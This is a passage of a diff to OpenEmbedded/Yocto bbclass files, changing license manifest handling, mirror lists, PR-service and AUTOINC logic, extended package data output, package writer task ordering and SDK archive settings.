output = format_pkg_list(pkgs)
- open(os.path.join(license_image_dir, 'package.manifest'),
- 'w+').write(output)
+ with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
+ package_manifest.write(output)
}
python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
if rootfs and copy_lic_manifest == "1":
- rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'),
- 'usr', 'share', 'common-licenses')
+ rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
bb.utils.mkdirhier(rootfs_license_dir)
rootfs_license_manifest = os.path.join(rootfs_license_dir,
os.path.split(license_manifest)[1])
@@ -125,7 +126,6 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
licenses = os.listdir(pkg_license_dir)
for lic in licenses:
- rootfs_license = os.path.join(rootfs_license_dir, lic)
pkg_license = os.path.join(pkg_license_dir, lic)
pkg_rootfs_license = os.path.join(pkg_rootfs_license_dir, lic)
@@ -144,11 +144,14 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
bad_licenses) == False:
continue
+ # Make sure we use only canonical name for the license file
+ generic_lic_file = "generic_%s" % generic_lic
+ rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
if not os.path.exists(rootfs_license):
oe.path.copyhardlink(pkg_license, rootfs_license)
if not os.path.exists(pkg_rootfs_license):
- os.symlink(os.path.join('..', lic), pkg_rootfs_license)
+ os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
else:
if (oe.license.license_ok(canonical_license(d,
lic), bad_licenses) == False or
@@ -208,9 +211,10 @@ def get_deployed_dependencies(d):
deploy = {}
# Get all the dependencies for the current task (rootfs).
taskdata = d.getVar("BB_TASKDEPDATA", False)
+ pn = d.getVar("PN")
depends = list(set([dep[0] for dep
in list(taskdata.values())
- if not dep[0].endswith("-native")]))
+ if not dep[0].endswith("-native") and not dep[0] == pn]))
# To verify what was deployed it checks the rootfs dependencies against
# the SSTATE_MANIFESTS for "deploy" task.
@@ -254,3 +258,13 @@ python do_populate_lic_deploy() {
addtask populate_lic_deploy before do_build after do_image_complete
do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
+python license_qa_dead_symlink() {
+ import os
+
+ for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
+ for file in files:
+ full_path = root + "/" + file
+ if os.path.islink(full_path) and not os.path.exists(full_path):
+ bb.error("broken symlink: " + full_path)
+}
+IMAGE_QA_COMMANDS += "license_qa_dead_symlink"
diff --git a/meta/classes/linux-dummy.bbclass b/meta/classes/linux-dummy.bbclass
new file mode 100644
index 0000000000..cd8791557d
--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
+
+python __anonymous () {
+ if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
+ # copy part codes from kernel.bbclass
+ kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
+
+ # set an empty package of kernel-devicetree
+ d.appendVar('PACKAGES', ' %s-devicetree' % kname)
+ d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
+
+ # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
+ type = d.getVar('KERNEL_IMAGETYPE') or ""
+ alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
+ types = d.getVar('KERNEL_IMAGETYPES') or ""
+ if type not in types.split():
+ types = (type + ' ' + types).strip()
+ if alttype not in types.split():
+ types = (alttype + ' ' + types).strip()
+
+ # set empty packages of kernel-image-*
+ for type in types.split():
+ typelower = type.lower()
+ d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
+ d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
+}
+
diff --git a/meta/classes/linuxloader.bbclass b/meta/classes/linuxloader.bbclass
index ec0e0556dd..796ab3afe4 100644
--- a/meta/classes/linuxloader.bbclass
+++ b/meta/classes/linuxloader.bbclass
@@ -1,6 +1,6 @@
def get_musl_loader_arch(d):
import re
- ldso_arch = None
+ ldso_arch = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch.startswith("microblaze"):
@@ -30,7 +30,7 @@ def get_musl_loader(d):
def get_glibc_loader(d):
import re
- dynamic_loader = None
+ dynamic_loader = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch in ["powerpc", "microblaze"]:
dynamic_loader = "${base_libdir}/ld.so.1"
@@ -56,7 +56,7 @@ def get_linuxloader(d):
overrides = d.getVar("OVERRIDES").split(":")
if "libc-baremetal" in overrides:
- return None
+ return "NotSupported"
if "libc-musl" in overrides:
dynamic_loader = get_musl_loader(d)
diff --git a/meta/classes/metadata_scm.bbclass b/meta/classes/metadata_scm.bbclass
index 58bb4c555a..47cb969b8d 100644
--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,6 +1,3 @@
-METADATA_BRANCH ?= "${@base_detect_branch(d)}"
-METADATA_REVISION ?= "${@base_detect_revision(d)}"
-
def base_detect_revision(d):
path = base_get_scmbasepath(d)
return base_get_metadata_git_revision(path, d)
@@ -40,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
except bb.process.ExecutionError:
rev = '<unknown>'
return rev.strip()
+
+METADATA_BRANCH := "${@base_detect_branch(d)}"
+METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
+METADATA_REVISION := "${@base_detect_revision(d)}"
+METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472..669d0cc8ff 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
-http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
${APACHE_MIRROR} http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
+gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
@@ -53,6 +53,7 @@ npm://.*/?.* http://downloads.yoctoproject.org/mirror/sources/ \n \
cvs://.*/.* http://sources.openembedded.org/ \n \
svn://.*/.* http://sources.openembedded.org/ \n \
git://.*/.* http://sources.openembedded.org/ \n \
+gitsm://.*/.* http://sources.openembedded.org/ \n \
hg://.*/.* http://sources.openembedded.org/ \n \
bzr://.*/.* http://sources.openembedded.org/ \n \
p4://.*/.* http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
npm://.*/?.* http://sources.openembedded.org/ \n \
${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
"
# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index ee677da1e2..b5c59ac593 100644
--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
+ e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
e.data.setVar("MLPREFIX", variant + "-")
override = ":virtclass-multilib-" + variant
e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
d.setVar("LINGUAS_INSTALL", "")
# FIXME, we need to map this to something, not delete it!
d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
- bb.build.deltask('do_populate_sdk', d)
bb.build.deltask('do_populate_sdk_ext', d)
return
diff --git a/meta/classes/nativesdk.bbclass b/meta/classes/nativesdk.bbclass
index 7f2692c51a..dc5a9756b6 100644
--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
USE_NLS = "${SDKUSE_NLS}"
OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
+
+PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"
diff --git a/meta/classes/npm.bbclass b/meta/classes/npm.bbclass
index 068032a1e5..bd01e247cd 100644
--- a/meta/classes/npm.bbclass
+++ b/meta/classes/npm.bbclass
@@ -17,8 +17,10 @@
# NPM_INSTALL_DEV:
# Set to 1 to also install devDependencies.
+inherit python3native
+
DEPENDS_prepend = "nodejs-native "
-RDEPENDS_${PN}_prepend = "nodejs "
+RDEPENDS_${PN}_append_class-target = " nodejs"
NPM_INSTALL_DEV ?= "0"
@@ -237,9 +239,7 @@ python npm_do_compile() {
sysroot = d.getVar("RECIPE_SYSROOT_NATIVE")
nodedir = os.path.join(sysroot, d.getVar("prefix_native").strip("/"))
configs.append(("nodedir", nodedir))
- bindir = os.path.join(sysroot, d.getVar("bindir_native").strip("/"))
- pythondir = os.path.join(bindir, "python-native", "python")
- configs.append(("python", pythondir))
+ configs.append(("python", d.getVar("PYTHON")))
# Add node-pre-gyp configuration
args.append(("target_arch", d.getVar("NPM_ARCH")))
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index cc64ddffc3..49d30caef7 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -7,7 +7,7 @@
#
# There are the following default steps but PACKAGEFUNCS can be extended:
#
-# a) package_get_auto_pr - get PRAUTO from remote PR service
+# a) package_convert_pr_autoinc - convert AUTOINC in PKGV to ${PRSERV_PV_AUTOINC}
#
# b) perform_packagecopy - Copy D into PKGD
#
@@ -585,12 +585,20 @@ def runtime_mapping_rename (varname, pkg, d):
#bb.note("%s after: %s" % (varname, d.getVar(varname)))
#
-# Package functions suitable for inclusion in PACKAGEFUNCS
+# Used by do_packagedata (and possibly other routines post do_package)
#
+package_get_auto_pr[vardepsexclude] = "BB_TASKDEPDATA"
python package_get_auto_pr() {
import oe.prservice
- import re
+
+ def get_do_package_hash(pn):
+ if d.getVar("BB_RUNTASK") != "do_package":
+ taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ for dep in taskdepdata:
+ if taskdepdata[dep][1] == "do_package" and taskdepdata[dep][0] == pn:
+ return taskdepdata[dep][6]
+ return None
# Support per recipe PRSERV_HOST
pn = d.getVar('PN')
@@ -602,15 +610,22 @@ python package_get_auto_pr() {
# PR Server not active, handle AUTOINC
if not d.getVar('PRSERV_HOST'):
- if 'AUTOINC' in pkgv:
- d.setVar("PKGV", pkgv.replace("AUTOINC", "0"))
+ d.setVar("PRSERV_PV_AUTOINC", "0")
return
auto_pr = None
pv = d.getVar("PV")
version = d.getVar("PRAUTOINX")
pkgarch = d.getVar("PACKAGE_ARCH")
- checksum = d.getVar("BB_TASKHASH")
+ checksum = get_do_package_hash(pn)
+
+ # If do_package isn't in the dependencies, we can't get the checksum...
+ if not checksum:
+ bb.warn('Task %s requested do_package unihash, but it was not available.' % d.getVar('BB_RUNTASK'))
+ #taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+ #for dep in taskdepdata:
+ # bb.warn('%s:%s = %s' % (taskdepdata[dep][0], taskdepdata[dep][1], taskdepdata[dep][6]))
+ return
if d.getVar('PRSERV_LOCKDOWN'):
auto_pr = d.getVar('PRAUTO_' + version + '_' + pkgarch) or d.getVar('PRAUTO_' + version) or None
@@ -628,7 +643,7 @@ python package_get_auto_pr() {
srcpv = bb.fetch2.get_srcrev(d)
base_ver = "AUTOINC-%s" % version[:version.find(srcpv)]
value = conn.getPR(base_ver, pkgarch, srcpv)
- d.setVar("PKGV", pkgv.replace("AUTOINC", str(value)))
+ d.setVar("PRSERV_PV_AUTOINC", str(value))
auto_pr = conn.getPR(version, pkgarch, checksum)
except Exception as e:
@@ -638,6 +653,22 @@ python package_get_auto_pr() {
d.setVar('PRAUTO',str(auto_pr))
}
+#
+# Package functions suitable for inclusion in PACKAGEFUNCS
+#
+
+python package_convert_pr_autoinc() {
+ pkgv = d.getVar("PKGV")
+
+ # Adjust pkgv as necessary...
+ if 'AUTOINC' in pkgv:
+ d.setVar("PKGV", pkgv.replace("AUTOINC", "${PRSERV_PV_AUTOINC}"))
+
+ # Change PRSERV_PV_AUTOINC and EXTENDPRAUTO usage to special values
+ d.setVar('PRSERV_PV_AUTOINC', '@PRSERV_PV_AUTOINC@')
+ d.setVar('EXTENDPRAUTO', '@EXTENDPRAUTO@')
+}
+
LOCALEBASEPN ??= "${PN}"
python package_do_split_locales() {
@@ -1109,6 +1140,14 @@ python split_and_strip_files () {
# Modified the file so clear the cache
cpath.updatecache(file)
+ def strip_pkgd_prefix(f):
+ nonlocal dvar
+
+ if f.startswith(dvar):
+ return f[len(dvar):]
+
+ return f
+
#
# First lets process debug splitting
#
@@ -1122,6 +1161,8 @@ python split_and_strip_files () {
for file in staticlibs:
results.append( (file,source_info(file, d)) )
+ d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
+
sources = set()
for r in results:
sources.update(r[1])
@@ -1429,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
python emit_pkgdata() {
from glob import glob
import json
+ import gzip
def process_postinst_on_target(pkg, mlprefix):
pkgval = d.getVar('PKG_%s' % pkg)
@@ -1501,6 +1543,8 @@ fi
with open(data_file, 'w') as fd:
fd.write("PACKAGES: %s\n" % packages)
+ pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
+
pn = d.getVar('PN')
global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
@@ -1520,17 +1564,32 @@ fi
pkgval = pkg
d.setVar('PKG_%s' % pkg, pkg)
+ extended_data = {
+ "files_info": {}
+ }
+
pkgdestpkg = os.path.join(pkgdest, pkg)
files = {}
+ files_extra = {}
total_size = 0
seen = set()
for f in pkgfiles[pkg]:
- relpth = os.path.relpath(f, pkgdestpkg)
+ fpath = os.sep + os.path.relpath(f, pkgdestpkg)
+
fstat = os.lstat(f)
- files[os.sep + relpth] = fstat.st_size
+ files[fpath] = fstat.st_size
+
+ extended_data["files_info"].setdefault(fpath, {})
+ extended_data["files_info"][fpath]['size'] = fstat.st_size
+
if fstat.st_ino not in seen:
seen.add(fstat.st_ino)
total_size += fstat.st_size
+
+ if fpath in pkgdebugsource:
+ extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
+ del pkgdebugsource[fpath]
+
d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1551,6 +1610,10 @@ fi
sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
+ subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
+ with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
+ json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
+
# Symlinks needed for rprovides lookup
rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
if rprov:
@@ -1581,7 +1644,8 @@ fi
write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
}
-emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides"
+emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
+emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
ldconfig_postinst_fragment() {
if [ x"$D" = "x" ]; then
@@ -1589,7 +1653,7 @@ if [ x"$D" = "x" ]; then
fi
}
-RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps"
+RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
# Collect perfile run-time dependency metadata
# Output:
@@ -1958,12 +2022,12 @@ python package_do_pkgconfig () {
for pkg in packages.split():
pkgconfig_provided[pkg] = []
pkgconfig_needed[pkg] = []
- for file in pkgfiles[pkg]:
+ for file in sorted(pkgfiles[pkg]):
m = pc_re.match(file)
if m:
pd = bb.data.init()
name = m.group(1)
- pkgconfig_provided[pkg].append(name)
+ pkgconfig_provided[pkg].append(os.path.basename(name))
if not os.access(file, os.R_OK):
continue
with open(file, 'r') as f:
@@ -1986,7 +2050,7 @@ python package_do_pkgconfig () {
pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
if pkgconfig_provided[pkg] != []:
with open(pkgs_file, 'w') as f:
- for p in pkgconfig_provided[pkg]:
+ for p in sorted(pkgconfig_provided[pkg]):
f.write('%s\n' % p)
# Go from least to most specific since the last one found wins
@@ -2225,7 +2289,7 @@ python do_package () {
# cache. This is useful if an item this class depends on changes in a
# way that the output of this class changes. rpmdeps is a good example
# as any change to rpmdeps requires this to be rerun.
- # PACKAGE_BBCLASS_VERSION = "2"
+ # PACKAGE_BBCLASS_VERSION = "4"
# Init cachedpath
global cpath
@@ -2251,7 +2315,7 @@ python do_package () {
package_qa_handle_error("var-undefined", msg, d)
return
- bb.build.exec_func("package_get_auto_pr", d)
+ bb.build.exec_func("package_convert_pr_autoinc", d)
###########################################################################
# Optimisations
@@ -2323,9 +2387,21 @@ addtask do_package_setscene
# Copy from PKGDESTWORK to tempdirectory as tempdirectory can be cleaned at both
# do_package_setscene and do_packagedata_setscene leading to races
python do_packagedata () {
+ bb.build.exec_func("package_get_auto_pr", d)
+
src = d.expand("${PKGDESTWORK}")
dest = d.expand("${WORKDIR}/pkgdata-pdata-input")
oe.path.copyhardlinktree(src, dest)
+
+ bb.build.exec_func("packagedata_translate_pr_autoinc", d)
+}
+do_packagedata[cleandirs] += "${WORKDIR}/pkgdata-pdata-input"
+
+# Translate the EXTENDPRAUTO and AUTOINC to the final values
+packagedata_translate_pr_autoinc() {
+ find ${WORKDIR}/pkgdata-pdata-input -type f | xargs --no-run-if-empty \
+ sed -e 's,@PRSERV_PV_AUTOINC@,${PRSERV_PV_AUTOINC},g' \
+ -e 's,@EXTENDPRAUTO@,${EXTENDPRAUTO},g' -i
}
addtask packagedata before do_build after do_package
diff --git a/meta/classes/package_deb.bbclass b/meta/classes/package_deb.bbclass
index 790b26aef2..fa8c6c82ff 100644
--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
do_package_write_deb[umask] = "022"
do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_deb after do_packagedata do_package
-
+EPOCHTASK ??= ""
+addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index c008559e4a..4927cfba00 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
do_package_write_ipk[umask] = "022"
do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_ipk after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"
diff --git a/meta/classes/package_pkgdata.bbclass b/meta/classes/package_pkgdata.bbclass
index 18b7ed62e0..a1ea8fc041 100644
--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
}
package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
-package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA"
+package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
diff --git a/meta/classes/package_rpm.bbclass b/meta/classes/package_rpm.bbclass
index 9145717f98..65587d228b 100644
--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,10 +678,12 @@ python do_package_rpm () {
cmd = cmd + " --define '_use_internal_dependency_generator 0'"
cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
cmd = cmd + " --define '_build_id_links none'"
- cmd = cmd + " --define '_binary_payload w6T.xzdio'"
- cmd = cmd + " --define '_source_payload w6T.xzdio'"
+ cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
+ cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
+ cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
cmd = cmd + " --define '_buildhost reproducible'"
+ cmd = cmd + " --define '__font_provides %{nil}'"
if perfiledeps:
cmd = cmd + " --define '__find_requires " + outdepends + "'"
cmd = cmd + " --define '__find_provides " + outprovides + "'"
@@ -741,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
do_package_write_rpm[umask] = "022"
do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
-addtask package_write_rpm after do_packagedata do_package
+EPOCHTASK ??= ""
+addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
patchdir = parm["patchdir"]
if not os.path.isabs(patchdir):
patchdir = os.path.join(s, patchdir)
+ if not os.path.isdir(patchdir):
+ bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
+ (patchdir, parm["patchdir"], parm['patchname']))
else:
patchdir = s
@@ -147,12 +150,12 @@ python patch_do_patch() {
patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
except Exception as exc:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(exc))
+ bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
try:
resolver.Resolve()
except bb.BBHandledException as e:
bb.utils.remove(process_tmpdir, True)
- bb.fatal(str(e))
+ bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
bb.utils.remove(process_tmpdir, True)
del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index 3e5b1359d6..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
SDK_ARCHIVE_TYPE ?= "tar.xz"
SDK_XZ_COMPRESSION_LEVEL ?= "-9"
SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
+SDK_ZIP_OPTIONS ?= "-y"
+
# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
python () {
@@ -58,7 +60,7 @@ python () {
d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
# SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
# recommand to cd into input dir first to avoid archive with buildpath
- d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
+ d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
else:
d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
-PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
+PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
SDK_DEPENDS += "nativesdk-glibc-locale"
# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,6 +180,8 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
+PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
+
fakeroot create_sdk_files() {
cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
@@ -256,7 +260,7 @@ fakeroot create_shar() {
rm -f ${T}/pre_install_command ${T}/post_install_command
- if [ ${SDK_RELOCATE_AFTER_INSTALL} -eq 1 ] ; then
+ if [ "${SDK_RELOCATE_AFTER_INSTALL}" = "1" ] ; then
cp ${TOOLCHAIN_SHAR_REL_TMPL} ${T}/post_install_command
fi
cat << "EOF" >> ${T}/pre_install_command
@@ -273,6 +277,7 @@ EOF
# substitute variables
sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
-e 's#@SDKPATH@#${SDKPATH}#g' \
+ -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
-e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
-e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
-e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -322,6 +327,13 @@ def sdk_variables(d):
do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
+python () {
+ variables = sdk_command_variables(d)
